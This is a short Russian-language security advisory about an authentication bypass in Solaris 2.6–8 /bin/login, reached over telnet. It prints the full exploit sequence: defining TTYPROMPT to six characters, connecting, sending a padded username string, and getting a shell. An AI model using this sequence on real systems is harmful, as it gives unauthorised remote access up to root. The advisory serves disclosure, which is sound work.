В Sun Solaris обнаружен тривиальный метод обхода идентификации в /bin/login. Уязвимость позволяет удаленному атакующему получить неавторизованный локальный доступ под любым пользователем, в т.ч. и root. Для успешной эксплуатации достаточно определить переменную TTYPROMPT, равную 6 символам, в процессе телнет сессии. Скорее всего проблема связанна с переполнением буфера: 

Пример: 

telnet> environ define TTYPROMPT abcdef 
telnet> o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n 
Last login: whenever 
$ whoami 
bin 

Уязвимость обнаружена в Sun Solaris 2.6-8.0.



Оставить мнение